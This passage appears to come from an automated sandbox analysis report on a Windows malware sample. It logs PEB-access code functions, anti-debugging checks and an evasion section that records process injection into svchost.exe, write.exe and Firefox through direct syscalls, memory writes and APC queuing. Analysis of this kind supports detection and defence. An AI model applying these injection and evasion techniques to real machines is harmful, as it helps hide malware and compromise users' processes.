            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A830 mov eax, dword ptr fs:[00000030h]2_2_0386A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D483A mov eax, dword ptr fs:[00000030h]2_2_038D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D483A mov eax, dword ptr fs:[00000030h]2_2_038D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03842840 mov ecx, dword ptr fs:[00000030h]2_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860854 mov eax, dword ptr fs:[00000030h]2_2_03860854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834859 mov eax, dword ptr fs:[00000030h]2_2_03834859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834859 mov eax, dword ptr fs:[00000030h]2_2_03834859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE872 mov eax, dword ptr fs:[00000030h]2_2_038BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE872 mov eax, dword ptr fs:[00000030h]2_2_038BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6870 mov eax, dword ptr fs:[00000030h]2_2_038C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6870 mov eax, dword ptr fs:[00000030h]2_2_038C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CF80 mov eax, dword ptr fs:[00000030h]2_2_0386CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862F98 mov eax, dword ptr fs:[00000030h]2_2_03862F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862F98 mov eax, dword ptr fs:[00000030h]2_2_03862F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC8 mov eax, dword ptr fs:[00000030h]2_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC8 mov eax, dword ptr fs:[00000030h]2_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC8 mov eax, dword ptr fs:[00000030h]2_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC8 mov eax, dword ptr fs:[00000030h]2_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382EFD8 mov eax, dword ptr fs:[00000030h]2_2_0382EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382EFD8 mov eax, dword ptr fs:[00000030h]2_2_0382EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382EFD8 mov eax, dword ptr fs:[00000030h]2_2_0382EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE0 mov eax, dword ptr fs:[00000030h]2_2_0384CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE0 mov eax, dword ptr fs:[00000030h]2_2_0384CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870FF6 mov eax, dword ptr fs:[00000030h]2_2_03870FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870FF6 mov eax, dword ptr fs:[00000030h]2_2_03870FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870FF6 mov eax, dword ptr fs:[00000030h]2_2_03870FF6
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 672Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F0B008Jump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lPX6PixV4t.exe"Jump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
